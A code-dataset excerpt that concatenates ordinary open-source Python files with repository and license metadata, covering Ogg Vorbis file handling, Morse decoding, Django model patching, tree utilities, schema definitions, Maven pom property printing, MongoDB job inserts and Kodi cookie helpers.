for elt in flat_toc if len(elt['index']) == 2}
self.cfr_part = part
self.cfr_title = meta.get('cfr_title_number')
self.section = None
title = '{} CFR {}'.format(self.cfr_title, part)
markup_id = '{}-cfr-{}'.format(doc_number, part)
self.toc.append(NavItem(
url=reverse('cfr_changes', kwargs={
'doc_number': doc_number, 'section': part}),
title=Title('Authority', title, 'Authority'),
markup_id=markup_id,
category=title,
section_id='')) # disable AJAX
_cfr_re = re.compile(r'(§ [\d.]+) (.*)')
def _change_title(self, section):
if section not in self.section_titles:
logger.error("Could not find section title for %s", section)
title_str = self.section_titles.get(section, '')
# Hack: Reconstitute node prefix and title
# TODO: Emit these fields in a ToC layer in -parser instead
match = self._cfr_re.search(title_str)
if match:
return Title(title_str, *match.groups())
else:
return Title(title_str, title_str)
def add_change(self, doc_number, label_parts):
"""While processing an amendment, we will encounter sections we
haven't seen before -- these will ultimately be ToC entries"""
change_section = label_parts[1]
is_subpart = 'Subpart' in label_parts or 'Subjgrp' in label_parts
if not is_subpart and (self.section is None or
self.section != change_section):
self.section = change_section
section = '-'.join(label_parts[:2])
self.toc.append(NavItem(
url=reverse('cfr_changes', kwargs={
'doc_number': doc_number,
'section': section}),
title=self._change_title(change_section),
markup_id='{}-cfr-{}'.format(doc_number, section),
category='{} CFR {}'.format(self.cfr_title, self.cfr_part)
))
def make_cfr_change_nav(doc_number, version_info, amendments):
"""Soup to nuts conversion from a document number to a table of contents
list"""
builder = CFRChangeBuilder()
for amendment in amendments:
# Amendments are of the form
# {'cfr_part': 111, 'instruction': 'text1', 'authority': 'text2'} or
# {'cfr_part': 111, 'instruction': 'text3',
# 'changes': [['111-22-c', [data1]], ['other', [data2]]}
builder.add_cfr_part(doc_number, version_info, amendment)
for change_label, _ in amendment.get('changes', []):
builder.add_change(doc_number, change_label.split('-'))
return builder.toc
def footer(preamble_toc, cfr_toc, full_id):
"""Generate "navigation" context which allows the user to move between
sections in the footer"""
items = preamble_toc + cfr_toc
nav = {'previous': None, 'next': None, 'page_type': 'preamble-section'}
for idx, item in enumerate(items):
if item.markup_id == full_id:
if idx > 0:
nav['previous'] = items[idx - 1]
if idx < len(items) - 1:
nav['next'] = items[idx + 1]
return nav
| cc0-1.0 | -783,655,856,690,520,600 | 38.052133 | 78 | 0.57949 | false | 3.886792 | false | false | false |
tuffy/python-audio-tools | audiotools/vorbis.py | 1 | 20653 | # Audio Tools, a module and set of tools for manipulating audio data
# Copyright (C) 2007-2016 Brian Langenberger
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from audiotools import (AudioFile, InvalidFile, ChannelMask)
class InvalidVorbis(InvalidFile):
pass
class VorbisAudio(AudioFile):
"""an Ogg Vorbis file"""
from audiotools.text import (COMP_VORBIS_0,
COMP_VORBIS_10)
SUFFIX = "ogg"
NAME = SUFFIX
DESCRIPTION = u"Ogg Vorbis"
DEFAULT_COMPRESSION = "3"
COMPRESSION_MODES = tuple([str(i) for i in range(0, 11)])
COMPRESSION_DESCRIPTIONS = {"0": COMP_VORBIS_0,
"10": COMP_VORBIS_10}
def __init__(self, filename):
"""filename is a plain string"""
AudioFile.__init__(self, filename)
self.__sample_rate__ = 0
self.__channels__ = 0
try:
self.__read_identification__()
except IOError as msg:
raise InvalidVorbis(str(msg))
def __read_identification__(self):
from audiotools.bitstream import BitstreamReader
with BitstreamReader(open(self.filename, "rb"), True) as ogg_reader:
(magic_number,
version,
header_type,
granule_position,
self.__serial_number__,
page_sequence_number,
checksum,
segment_count) = ogg_reader.parse("4b 8u 8u 64S 32u 32u 32u 8u")
if magic_number != b'OggS':
from audiotools.text import ERR_OGG_INVALID_MAGIC_NUMBER
raise InvalidVorbis(ERR_OGG_INVALID_MAGIC_NUMBER)
if version != 0:
from audiotools.text import ERR_OGG_INVALID_VERSION
raise InvalidVorbis(ERR_OGG_INVALID_VERSION)
segment_length = ogg_reader.read(8)
(vorbis_type,
header,
version,
self.__channels__,
self.__sample_rate__,
maximum_bitrate,
nominal_bitrate,
minimum_bitrate,
blocksize0,
blocksize1,
framing) = ogg_reader.parse(
"8u 6b 32u 8u 32u 32u 32u 32u 4u 4u 1u")
if vorbis_type != 1:
from audiotools.text import ERR_VORBIS_INVALID_TYPE
raise InvalidVorbis(ERR_VORBIS_INVALID_TYPE)
if header != b'vorbis':
from audiotools.text import ERR_VORBIS_INVALID_HEADER
raise InvalidVorbis(ERR_VORBIS_INVALID_HEADER)
if version != 0:
from audiotools.text import ERR_VORBIS_INVALID_VERSION
raise InvalidVorbis(ERR_VORBIS_INVALID_VERSION)
if framing != 1:
from audiotools.text import ERR_VORBIS_INVALID_FRAMING_BIT
raise InvalidVorbis(ERR_VORBIS_INVALID_FRAMING_BIT)
def lossless(self):
"""returns False"""
return False
def bits_per_sample(self):
"""returns an integer number of bits-per-sample this track contains"""
return 16
def channels(self):
"""returns an integer number of channels this track contains"""
return self.__channels__
def channel_mask(self):
"""returns a ChannelMask object of this track's channel layout"""
if self.channels() == 1:
return ChannelMask.from_fields(
front_center=True)
elif self.channels() == 2:
return ChannelMask.from_fields(
front_left=True, front_right=True)
elif self.channels() == 3:
return ChannelMask.from_fields(
front_left=True, front_right=True,
front_center=True)
elif self.channels() == 4:
return ChannelMask.from_fields(
front_left=True, front_right=True,
back_left=True, back_right=True)
elif self.channels() == 5:
return ChannelMask.from_fields(
front_left=True, front_right=True,
front_center=True,
back_left=True, back_right=True)
elif self.channels() == 6:
return ChannelMask.from_fields(
front_left=True, front_right=True,
front_center=True,
back_left=True, back_right=True,
low_frequency=True)
elif self.channels() == 7:
return ChannelMask.from_fields(
front_left=True, front_right=True,
front_center=True,
side_left=True, side_right=True,
back_center=True, low_frequency=True)
elif self.channels() == 8:
return ChannelMask.from_fields(
front_left=True, front_right=True,
side_left=True, side_right=True,
back_left=True, back_right=True,
front_center=True, low_frequency=True)
else:
return ChannelMask(0)
def total_frames(self):
"""returns the total PCM frames of the track as an integer"""
from audiotools._ogg import PageReader
try:
with PageReader(open(self.filename, "rb")) as reader:
page = reader.read()
pcm_samples = page.granule_position
while not page.stream_end:
page = reader.read()
pcm_samples = max(pcm_samples, page.granule_position)
return pcm_samples
except (IOError, ValueError):
return 0
def sample_rate(self):
"""returns the rate of the track's audio as an integer number of Hz"""
return self.__sample_rate__
@classmethod
def supports_to_pcm(cls):
"""returns True if all necessary components are available
to support the .to_pcm() method"""
try:
from audiotools.decoders import VorbisDecoder
return True
except ImportError:
return False
def to_pcm(self):
"""returns a PCMReader object containing the track's PCM data"""
from audiotools.decoders import VorbisDecoder
try:
return VorbisDecoder(self.filename)
except ValueError as err:
from audiotools import PCMReaderError
return PCMReaderError(str(err),
self.sample_rate(),
self.channels(),
int(self.channel_mask()),
self.bits_per_sample())
@classmethod
def supports_from_pcm(cls):
"""returns True if all necessary components are available
to support the .from_pcm() classmethod"""
try:
from audiotools.encoders import encode_vorbis
return True
except ImportError:
return False
@classmethod
def from_pcm(cls, filename, pcmreader,
compression=None, total_pcm_frames=None):
"""encodes a new file from PCM data
takes a filename string, PCMReader object,
optional compression level string and
optional total_pcm_frames integer
encodes a new audio file from pcmreader's data
at the given filename with the specified compression level
and returns a new VorbisAudio object"""
from audiotools import (BufferedPCMReader,
__default_quality__,
EncodingError)
from audiotools.encoders import encode_vorbis
if (((compression is None) or
(compression not in cls.COMPRESSION_MODES))):
compression = __default_quality__(cls.NAME)
if pcmreader.bits_per_sample not in {8, 16, 24}:
from audiotools import UnsupportedBitsPerSample
pcmreader.close()
raise UnsupportedBitsPerSample(filename, pcmreader.bits_per_sample)
if (pcmreader.channels > 2) and (pcmreader.channels <= 8):
channel_mask = int(pcmreader.channel_mask)
if ((channel_mask != 0) and
(channel_mask not in
(0x7, # FR, FC, FL
0x33, # FR, FL, BR, BL
0x37, # FR, FC, FL, BL, BR
0x3f, # FR, FC, FL, BL, BR, LFE
0x70f, # FL, FC, FR, SL, SR, BC, LFE
0x63f))): # FL, FC, FR, SL, SR, BL, BR, LFE
from audiotools import UnsupportedChannelMask
pcmreader.close()
raise UnsupportedChannelMask(filename, channel_mask)
if total_pcm_frames is not None:
from audiotools import CounterPCMReader
pcmreader = CounterPCMReader(pcmreader)
try:
encode_vorbis(filename,
pcmreader,
float(compression) / 10)
if ((total_pcm_frames is not None) and
(total_pcm_frames != pcmreader.frames_written)):
from audiotools.text import ERR_TOTAL_PCM_FRAMES_MISMATCH
cls.__unlink__(filename)
raise EncodingError(ERR_TOTAL_PCM_FRAMES_MISMATCH)
return VorbisAudio(filename)
except (ValueError, IOError) as err:
cls.__unlink__(filename)
raise EncodingError(str(err))
finally:
pcmreader.close()
def update_metadata(self, metadata):
"""takes this track's current MetaData object
as returned by get_metadata() and sets this track's metadata
with any fields updated in that object
raises IOError if unable to write the file
"""
import os
from audiotools import TemporaryFile
from audiotools.ogg import (PageReader,
PacketReader,
PageWriter,
packet_to_pages,
packets_to_pages)
from audiotools.vorbiscomment import VorbisComment
from audiotools.bitstream import BitstreamRecorder
if metadata is None:
return
elif not isinstance(metadata, VorbisComment):
from audiotools.text import ERR_FOREIGN_METADATA
raise ValueError(ERR_FOREIGN_METADATA)
elif not os.access(self.filename, os.W_OK):
raise IOError(self.filename)
original_ogg = PacketReader(PageReader(open(self.filename, "rb")))
new_ogg = PageWriter(TemporaryFile(self.filename))
sequence_number = 0
# transfer current file's identification packet in its own page
identification_packet = original_ogg.read_packet()
for (i, page) in enumerate(packet_to_pages(
identification_packet,
self.__serial_number__,
starting_sequence_number=sequence_number)):
page.stream_beginning = (i == 0)
new_ogg.write(page)
sequence_number += 1
# discard the current file's comment packet
comment_packet = original_ogg.read_packet()
# generate new comment packet
comment_writer = BitstreamRecorder(True)
comment_writer.build("8u 6b", (3, b"vorbis"))
vendor_string = metadata.vendor_string.encode('utf-8')
comment_writer.build("32u {:d}b".format(len(vendor_string)),
(len(vendor_string), vendor_string))
comment_writer.write(32, len(metadata.comment_strings))
for comment_string in metadata.comment_strings:
comment_string = comment_string.encode('utf-8')
comment_writer.build("32u {:d}b".format(len(comment_string)),
(len(comment_string), comment_string))
comment_writer.build("1u a", (1,)) # framing bit
# transfer codebooks packet from original file to new file
codebooks_packet = original_ogg.read_packet()
for page in packets_to_pages(
[comment_writer.data(), codebooks_packet],
self.__serial_number__,
starting_sequence_number=sequence_number):
new_ogg.write(page)
sequence_number += 1
# transfer remaining pages after re-sequencing
page = original_ogg.read_page()
page.sequence_number = sequence_number
page.bitstream_serial_number = self.__serial_number__
sequence_number += 1
new_ogg.write(page)
while not page.stream_end:
page = original_ogg.read_page()
page.sequence_number = sequence_number
page.bitstream_serial_number = self.__serial_number__
sequence_number += 1
new_ogg.write(page)
original_ogg.close()
new_ogg.close()
def set_metadata(self, metadata):
"""takes a MetaData object and sets this track's metadata
this metadata includes track name, album name, and so on
raises IOError if unable to write the file"""
from audiotools.vorbiscomment import VorbisComment
if metadata is None:
return self.delete_metadata()
metadata = VorbisComment.converted(metadata)
old_metadata = self.get_metadata()
metadata.vendor_string = old_metadata.vendor_string
# remove REPLAYGAIN_* tags from new metadata (if any)
for key in [u"REPLAYGAIN_TRACK_GAIN",
u"REPLAYGAIN_TRACK_PEAK",
u"REPLAYGAIN_ALBUM_GAIN",
u"REPLAYGAIN_ALBUM_PEAK",
u"REPLAYGAIN_REFERENCE_LOUDNESS"]:
try:
metadata[key] = old_metadata[key]
except KeyError:
metadata[key] = []
self.update_metadata(metadata)
@classmethod
def supports_metadata(cls):
"""returns True if this audio type supports MetaData"""
return True
def get_metadata(self):
"""returns a MetaData object, or None
raises IOError if unable to read the file"""
from io import BytesIO
from audiotools.bitstream import BitstreamReader
from audiotools.ogg import PacketReader, PageReader
from audiotools.vorbiscomment import VorbisComment
with PacketReader(PageReader(open(self.filename, "rb"))) as reader:
identification = reader.read_packet()
comment = BitstreamReader(BytesIO(reader.read_packet()), True)
(packet_type, packet_header) = comment.parse("8u 6b")
if (packet_type == 3) and (packet_header == b'vorbis'):
vendor_string = \
comment.read_bytes(comment.read(32)).decode('utf-8')
comment_strings = [
comment.read_bytes(comment.read(32)).decode('utf-8')
for i in range(comment.read(32))]
if comment.read(1) == 1: # framing bit
return VorbisComment(comment_strings, vendor_string)
else:
return None
else:
return None
def delete_metadata(self):
"""deletes the track's MetaData
this removes or unsets tags as necessary in order to remove all data
raises IOError if unable to write the file"""
from audiotools import MetaData
# the vorbis comment packet is required,
# so simply zero out its contents
self.set_metadata(MetaData())
@classmethod
def supports_replay_gain(cls):
"""returns True if this class supports ReplayGain"""
return True
def get_replay_gain(self):
"""returns a ReplayGain object of our ReplayGain values
returns None if we have no values"""
from audiotools import ReplayGain
vorbis_metadata = self.get_metadata()
if ((vorbis_metadata is not None) and
({u'REPLAYGAIN_TRACK_PEAK',
u'REPLAYGAIN_TRACK_GAIN',
u'REPLAYGAIN_ALBUM_PEAK',
u'REPLAYGAIN_ALBUM_GAIN'}.issubset(vorbis_metadata.keys()))):
# we have ReplayGain data
try:
return ReplayGain(
vorbis_metadata[u'REPLAYGAIN_TRACK_GAIN'][0][0:-len(u" dB")],
vorbis_metadata[u'REPLAYGAIN_TRACK_PEAK'][0],
vorbis_metadata[u'REPLAYGAIN_ALBUM_GAIN'][0][0:-len(u" dB")],
vorbis_metadata[u'REPLAYGAIN_ALBUM_PEAK'][0])
except (IndexError, ValueError):
return None
else:
return None
def set_replay_gain(self, replaygain):
"""given a ReplayGain object, sets the track's gain to those values
may raise IOError if unable to modify the file"""
if replaygain is None:
return self.delete_replay_gain()
vorbis_comment = self.get_metadata()
if vorbis_comment is None:
from audiotools.vorbiscomment import VorbisComment
from audiotools import VERSION
vorbis_comment = VorbisComment(
[], u"Python Audio Tools {}".format(VERSION))
vorbis_comment[u"REPLAYGAIN_TRACK_GAIN"] = [
u"{:.2f} dB".format(replaygain.track_gain)]
vorbis_comment[u"REPLAYGAIN_TRACK_PEAK"] = [
u"{:.8f}".format(replaygain.track_peak)]
vorbis_comment[u"REPLAYGAIN_ALBUM_GAIN"] = [
u"{:.2f} dB".format(replaygain.album_gain)]
vorbis_comment[u"REPLAYGAIN_ALBUM_PEAK"] = [
u"{:.8f}".format(replaygain.album_peak)]
vorbis_comment[u"REPLAYGAIN_REFERENCE_LOUDNESS"] = [u"89.0 dB"]
self.update_metadata(vorbis_comment)
def delete_replay_gain(self):
"""removes ReplayGain values from file, if any
may raise IOError if unable to modify the file"""
vorbis_comment = self.get_metadata()
if vorbis_comment is not None:
for field in [u"REPLAYGAIN_TRACK_GAIN",
u"REPLAYGAIN_TRACK_PEAK",
u"REPLAYGAIN_ALBUM_GAIN",
u"REPLAYGAIN_ALBUM_PEAK",
u"REPLAYGAIN_REFERENCE_LOUDNESS"]:
try:
del(vorbis_comment[field])
except KeyError:
pass
self.update_metadata(vorbis_comment)
class VorbisChannelMask(ChannelMask):
"""the Vorbis-specific channel mapping"""
def __repr__(self):
return "VorbisChannelMask({})".format(
",".join(["{}={}".format(field, getattr(self, field))
for field in self.SPEAKER_TO_MASK.keys()
if (getattr(self, field))]))
def channels(self):
"""returns a list of speaker strings this mask contains
returned in the order in which they should appear
in the PCM stream
"""
count = len(self)
if count == 1:
return ["front_center"]
elif count == 2:
return ["front_left", "front_right"]
elif count == 3:
return ["front_left", "front_center", "front_right"]
elif count == 4:
return ["front_left", "front_right",
"back_left", "back_right"]
elif count == 5:
return ["front_left", "front_center", "front_right",
"back_left", "back_right"]
elif count == 6:
return ["front_left", "front_center", "front_right",
"back_left", "back_right", "low_frequency"]
elif count == 7:
return ["front_left", "front_center", "front_right",
"side_left", "side_right", "back_center",
"low_frequency"]
elif count == 8:
return ["front_left", "front_center", "front_right",
"side_left", "side_right",
"back_left", "back_right", "low_frequency"]
else:
return []
| gpl-2.0 | -6,530,508,446,178,070,000 | 35.946333 | 81 | 0.566697 | false | 4.173166 | false | false | false |
SylvainDe/morse-talk | morse_talk/decoding.py | 1 | 1432 | """
Functions to decode messages
"""
# Copyright (C) 2015 by
# Himanshu Mishra <[email protected]>
# All rights reserved.
# GNU license.
from . import encoding
__all__ = ['decode']
def decode(code, encoding_type='default'):
"""Converts a string of morse code into English message
The encoded message can also be decoded using the same morse chart
backwards.
"""
reversed_morsetab = {symbol: character for character,
symbol in list(getattr(encoding, 'morsetab').items())}
if encoding_type == 'default':
# For spacing the words
letters = 0
words = 0
index = {}
for i in range(len(code)):
if code[i: i+3] == ' ':
if code[i: i+7] == ' ':
words += 1
letters += 1
index[words] = letters
elif code[i+4] and code[i-1] != ' ': # Check for ' '
letters += 1
message = [reversed_morsetab[i] for i in code.split()]
for i, (word, letter) in enumerate(list(index.items())):
message.insert(letter + i, ' ')
return ''.join(message)
if encoding_type == 'binary':
return ('Sorry, but it seems that binary encodings can have multiple'
' messages. So for now, we couldn\'t show even one of them.')
| gpl-2.0 | -3,792,566,459,160,271,400 | 29.468085 | 79 | 0.521648 | false | 4.056657 | false | false | false |
demdxx/django-cors-atomregister | corsatomregister/patching.py | 1 | 2886 | import sys
from django.db import models
from django.core.signals import request_started
from django.db.models import signals
from django.utils.importlib import import_module
from .utils import register, unregister, isregister, countregister, get_users
def import_class(module, class_name):
return getattr(import_module(module),class_name)
def monkey(model, info):
# Init base params
code = info.get('code', 1)
unique = info.get('unique', True)
methods = info.get('names')
positive_only = info.get('positive_only', False)
counter_field = info.get('counter_field', None)
if isinstance(methods,basestring):
methods = dict((k, '%s_%s' % (k, methods)) for k in ['set', 'uset', 'is', 'count', 'users'])
# Patch methods
for k in methods:
if k == 'set':
if positive_only:
setattr(model,methods[k],lambda self, user, **kwargs: register(code,user,self,unique,positive=True,counter_field=counter_field))
else:
setattr(model,methods[k],lambda self, user, positive=True: register(code,user,self,unique,positive=positive,counter_field=counter_field))
elif k == 'uset':
setattr(model,methods[k],lambda self, user: unregister(code,user,self,unique,counter_field=counter_field))
elif k == 'is':
setattr(model,methods[k],lambda self, user: isregister(code,user,self,unique))
elif k == 'count':
if positive_only:
setattr(model,methods[k],lambda self, **kwargs: countregister(code,self,positive=True))
else:
setattr(model,methods[k],lambda self, positive=True: countregister(code,self,positive=positive))
elif k == 'users':
setattr(model, methods[k], lambda self, positive=True: get_users(code, self, positive=positive))
else:
raise Exception, 'Undefined method: %s' % methods[k]
if counter_field:
fields = model._meta.get_all_field_names()
if not isinstance(counter_field,(list,tuple)):
counter_field = [counter_field]
# Patch model fields
for f in counter_field:
if f not in fields:
                # Add counter field as an unsigned int
model.add_to_class(f, models.PositiveIntegerField(default=0,editable=True,blank=True))
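# Illustrative settings entry (editor's sketch; the app, model and field names
# are hypothetical):
#   ATOMREGISTER = {
#       'blog.Post': {'code': 1, 'names': 'like', 'unique': True,
#                     'counter_field': 'likes_count'},
#   }
# With names='like' the patched model gains set_like/uset_like/is_like/
# count_like/users_like methods.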
def __init_patch__(**kwargs):
if not getattr(__init_patch__,'inited',False):
from .settings import ATOMREGISTER
for k in ATOMREGISTER:
app, mod = k.split('.')
model = import_class('%s.models' % app, mod)
monkey(model,ATOMREGISTER[k])
setattr(__init_patch__,'inited',True)
if len(sys.argv)>1 and ('run' in sys.argv[1] or 'server' in sys.argv[1] or sys.argv[1] in ['supervisor']):
request_started.connect(__init_patch__)
else:
__init_patch__()
| mit | -7,094,024,707,691,127,000 | 37.48 | 153 | 0.623008 | false | 3.802372 | false | false | false |
pyannote/pyannote-banyan | banyan/_common_base.py | 2 | 1906 | from functools import wraps
import inspect
import collections
import warnings
import types
import sys
from ._dummy_key import _CmpDummyKey as _CmpDummyKey
RED_BLACK_TREE = 0
"""
Red-black tree algorithm indicator; good for general use.
"""
SPLAY_TREE = 1
"""
Splay tree algorithm indicator; good for temporal locality cases.
"""
SORTED_LIST = 2
"""
Sorted list algorithm indicator; good for infrequent updates.
"""
def _updator_metadata(set_, init_info):
if init_info.updator is None:
return None
name_clss = [(name, cls) for \
(name, cls) in inspect.getmembers(init_info.updator, predicate = inspect.isclass) if name == 'Metadata']
assert len(name_clss) == 1
cls = name_clss[0][1]
compare = init_info.compare if init_info.compare is not None else \
lambda x, y: -1 if x < y else (0 if x == y else 1)
def update(m, key, l, r):
m.update(
key,
init_info.key if init_info.key is not None else lambda k: _CmpDummyKey(compare, k),
l,
r)
return (cls, update)
def _adopt_updator_methods(self, updator):
def method_wrapper(f):
def wrapper(*args, **kwargs):
return f(self, *args, **kwargs)
return wraps(f)(wrapper)
if updator is None:
return
for name, method in inspect.getmembers(updator()):
if name.find('_') == 0 or name in self.__dict__ or name == 'Metadata':
continue
try:
method_ = method.__func__ if sys.version_info >= (3, 0) else method.im_func
self.__dict__[name] = method_wrapper(method_)
except AttributeError:
warnings.warn(name, RuntimeWarning)
_CommonInitInfo = collections.namedtuple(
'_CommonInitInfo',
['key_type', 'alg', 'key', 'compare', 'updator'],
verbose = False)
| bsd-3-clause | -5,718,820,225,957,598,000 | 25.109589 | 112 | 0.593914 | false | 3.729941 | false | false | false |
neumark/unimodel | unimodel/ast.py | 1 | 2938 | """ Schema for unimodel objects.
This allows us to do several things:
- Encode the schema of the message along with the message itself
- Build ASTs from generators which take eg. jsonschema as input
- Create classes at runtime based on a schema (jsonschema or thrift)
etc.
"""
from unimodel.model import Unimodel, UnimodelUnion, Field, FieldFactory
from unimodel import types
from unimodel.metadata import Metadata
from unimodel.backends.json.type_data import MDK_TYPE_STRUCT_UNBOXED
import inspect
class SchemaObjectMetadata(Unimodel):
# TODO: validators
backend_data = Field(
types.Map(
types.UTF8, # Key is the name of the backend, eg: 'thrift'
# data for each backend should be represented as a simple dict
types.Map(types.UTF8, types.UTF8)))
class SchemaObject(Unimodel):
name = Field(types.UTF8, required=True)
namespace = Field(types.List(types.UTF8))
uri = Field(types.UTF8)
metadata = Field(types.Struct(SchemaObjectMetadata))
schema_object_field = Field(
types.Struct(SchemaObject),
required=True,
metadata=Metadata(
backend_data={'json': {MDK_TYPE_STRUCT_UNBOXED: True}}))
type_id_enum = types.Enum(types.type_id_to_name_dict())
# TypeDef is recursive because of ParametricType
class TypeDef(Unimodel):
pass
# List, Set, Map, Tuple
class ParametricType(Unimodel):
type_id = Field(type_id_enum, required=True)
type_parameters = Field(types.List(types.Struct(TypeDef)), required=True)
class TypeClass(UnimodelUnion):
primitive_type_id = Field(type_id_enum)
enum = Field(types.Map(types.Int, types.UTF8))
struct_name = Field(types.UTF8)
parametric_type = Field(types.Struct(ParametricType))
field_factory = FieldFactory()
field_factory.add_fields(TypeDef, {
'metadata': Field(types.Struct(SchemaObjectMetadata)),
'type_class': Field(types.Struct(TypeClass), required=True)})
class LiteralValue(UnimodelUnion):
integer = Field(types.Int)
double = Field(types.Double)
string = Field(types.UTF8)
class Literal(Unimodel):
literal_value = Field(types.Struct(LiteralValue()))
metadata = Field(
types.Struct(SchemaObjectMetadata),
metadata=Metadata(
backend_data={'json': {MDK_TYPE_STRUCT_UNBOXED: True}}))
class FieldDef(Unimodel):
common = schema_object_field
field_id = Field(types.Int)
field_type = Field(types.Struct(TypeDef), required=True)
required = Field(types.Bool, default=False)
default = Field(types.Struct(Literal))
class StructDef(Unimodel):
common = schema_object_field
is_union = Field(types.Bool, default=False)
fields = Field(types.List(types.Struct(FieldDef)), required=True)
class SchemaAST(Unimodel):
common = schema_object_field
description = Field(types.UTF8)
structs = Field(types.List(types.Struct(StructDef)))
root_struct_name = Field(types.UTF8)
| apache-2.0 | -2,165,810,892,055,699,000 | 30.255319 | 77 | 0.707624 | false | 3.548309 | false | false | false |
ericzundel/mvn2pants | src/python/squarepants/pom_properties.py | 1 | 1966 | #!/usr/bin/env python2.7
#
# Print properties from the pom.xml file as BASH variable settings.
# Note that the '.' characters in property names are re-written as '_'
#
import os
import re
import sys
from pom_handlers import DependencyInfo
from pom_utils import PomUtils
class PomProperties(object):
def safe_property_name(self, property_name):
"""Replace characters that aren't safe for bash variables with an underscore"""
return re.sub(r'\W', '_', property_name)
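  # Illustrative usage (editor's note; the property name is hypothetical):
  #   PomProperties().safe_property_name('project.build.sourceEncoding')
  #       -> 'project_build_sourceEncoding'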
def write_properties(self, pom_file_path, output_stream, rootdir=None):
di = DependencyInfo(pom_file_path, rootdir)
for property_name, value in di.properties.iteritems():
output_stream.write('{0}="{1}"\n'.format(self.safe_property_name(property_name), value))
# Print out some other things. These are useful for script/pants_kochiku_build_wrapper
output_stream.write('project_artifactId="{0}"\n'.format(di.artifactId))
output_stream.write('project_groupId="{0}"\n'.format(di.groupId))
def usage():
print "usage: {0} [args] ".format(sys.argv[0])
print "Prints all the properties defined in a pom.xml in bash variable syntax."
print ""
print "-?,-h Show this message"
PomUtils.common_usage()
sys.exit(1)
def main():
arguments = PomUtils.parse_common_args(sys.argv[1:])
flags = set(arg for arg in arguments if arg.startswith('-'))
for f in flags:
if f == '-h' or f == '-?':
usage()
return
else:
print ("Unknown flag {0}".format(f))
usage()
return
path_args = list(set(arguments) - flags)
if len(path_args) != 1 :
print("Expected a single project path that contains a pom.xml file.")
usage()
pom_file_path = os.path.join(os.path.realpath(path_args[0]), 'pom.xml')
if not os.path.exists(pom_file_path):
print ("Couldn't find {0}".format(pom_file_path))
usage()
PomProperties().write_properties(pom_file_path, sys.stdout)
if __name__ == '__main__':
main()
| apache-2.0 | -266,190,076,049,275,940 | 27.085714 | 94 | 0.667854 | false | 3.315346 | false | false | false |
jianhuashao/WebDownloadJobsManage | server/db_insert_jobs_base.py | 1 | 1293 | from pymongo import MongoClient
import pymongo
from datetime import datetime
mongodb_url = 'mongodb://192.168.0.30:27017/'
mongodb_url = 'mongodb://127.0.0.1:27017/'
client = MongoClient(mongodb_url)
db = client['web_jobs_server']
db = client['test_web_jobs_server']
print "** DB Collections: ", db.collection_names()
#collection = db[job_target]
#print collection
def make_job(job_id, job_url, job_file_path, client_id, create_date, update_date, job_status, http_status):
job = {
"job_id": job_id,
"job_url":job_url,
"job_file_path": job_file_path,
"client_id": client_id,
"create_date": create_date,
"update_date": update_date,
"job_status": job_status,
"http_status": http_status
}
return job
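# Illustrative usage (editor's sketch; the collection name and field values are
# placeholders, not part of the original script):
#   job = make_job('job-001', 'http://example.com/page', '/data/page.html',
#                  'client-01', 1483228800, 1483228800, 'pending', 0)
#   job_upsert(job, 'web_pages')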
## insert: only used for fresh inserts; an existing _id would cause a duplicate-key error
## save: same as the _update method, but creates the collection if it does not exist
## since ejdb does not support a custom _id, I have to use upsert
def job_upsert(job, collection):
j = db[collection].update({'job_id': job['job_id']}, {'$set':job}, upsert=True, multi=True)
print j
def job_insert(job, collection):
try:
j = db[collection].insert(job)
except pymongo.errors.DuplicateKeyError as e:
#print e
pass
except Exception as e:
#print e
pass
| apache-2.0 | 1,375,580,046,111,213,800 | 28.386364 | 107 | 0.703016 | false | 2.931973 | false | false | false |
eracknaphobia/plugin.video.mlbtv | resources/lib/utils.py | 1 | 2470 | import os, re, sys
from kodi_six import xbmc, xbmcvfs, xbmcaddon
if sys.version_info[0] > 2:
import http
cookielib = http.cookiejar
else:
import cookielib
try:
xbmc.translatePath = xbmcvfs.translatePath
except AttributeError:
pass
class Util:
addon_path = xbmc.translatePath(xbmcaddon.Addon().getAddonInfo('profile'))
def find(self, source, start_str, end_str):
start = source.find(start_str)
end = source.find(end_str, start + len(start_str))
if start != -1:
return source[start + len(start_str):end]
else:
return ''
def natural_sort_key(self, s):
_nsre = re.compile('([0-9]+)')
return [int(text) if text.isdigit() else text.lower()
for text in re.split(_nsre, s)]
def save_cookies(self, cookiejar):
cookie_file = os.path.join(self.addon_path, 'cookies.lwp')
cj = cookielib.LWPCookieJar()
try:
cj.load(cookie_file, ignore_discard=True)
except:
pass
for c in cookiejar:
args = dict(vars(c).items())
args['rest'] = args['_rest']
del args['_rest']
c = cookielib.Cookie(**args)
cj.set_cookie(c)
cj.save(cookie_file, ignore_discard=True)
def load_cookies(self):
cookie_file = os.path.join(self.addon_path, 'cookies.lwp')
cj = cookielib.LWPCookieJar()
try:
cj.load(cookie_file, ignore_discard=True)
except:
pass
return cj
def check_cookies(self):
perform_login = True
if os.path.isfile(os.path.join(self.addon_path, 'cookies.lwp')):
fingerprint_valid = False
ipid_valid = False
cj = cookielib.LWPCookieJar(os.path.join(self.addon_path, 'cookies.lwp'))
cj.load(os.path.join(self.addon_path, 'cookies.lwp'), ignore_discard=True)
for cookie in cj:
if cookie.name == "fprt" and not cookie.is_expired():
fingerprint_valid = True
elif cookie.name == "ipid" and not cookie.is_expired():
ipid_valid = True
if fingerprint_valid and ipid_valid:
perform_login = False
return perform_login
def delete_cookies(self):
if os.path.isfile(os.path.join(self.addon_path, 'cookies.lwp')):
os.remove(os.path.join(self.addon_path, 'cookies.lwp'))
| gpl-2.0 | -3,549,970,746,934,953,500 | 30.666667 | 86 | 0.57166 | false | 3.627019 | false | false | false |
MarouenMechtri/CNG-Manager | pyocni/adapters/cnv_toHTTP.py | 3 | 9363 | # Copyright 2010-2012 Institut Mines-Telecom
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Jun 21, 2012
